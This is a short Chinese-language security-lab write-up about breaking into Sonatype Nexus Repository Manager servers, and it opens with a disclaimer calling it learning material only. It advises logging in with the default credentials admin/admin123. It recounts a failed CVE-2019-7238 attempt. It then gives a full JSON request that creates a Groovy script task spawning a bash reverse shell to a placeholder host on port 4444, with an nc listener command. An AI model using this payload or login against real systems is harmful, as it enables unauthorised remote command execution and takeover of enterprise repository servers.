本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。
nexus系统是存在于各大企业里十分常见,均为nexus2/3
授权测试:
常见登录默认账号密码为admin/admin123(一般都能登陆进去)。
直接搜寻找nexus3 rce poc进行锤击,百度一波下载CVE-2019-7238命令执行按照它打打打
这里贴了一个没有写ip的包~其实是失败的,那个包找不到了。
执行完第一步之后返回true,但是第二步返回500未成功
发现该rce原来是版本并不管用,
而我的系统确实安全版本15
尝试使用ReverseShell来进行拿shell
填上然后抓包修改
发送Poc
```
{"action":"coreui_Task","method":"create","data":[{"id":"","typeId":"script","enabled":true,"name":"ReverseShell","alertEmail":"","schedule":"manual","properties":{"language":"grovy","source":"['/bin/bash','-c','/bin/bash-i >& /dev/tcp/IP_ADDRESS/4444 0>&1'].execute()"},"recuringDays":[],"startDate":null}],"type":"rpc","tid":22}
```
填上ip和监听端口:/IP_ADDRESS/4444
成功发生包后任务会出现刚刚我们发送的ReverseShell任务
直接run启动该任务
使用nc进行监听
nc -lvp 4444
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全实验室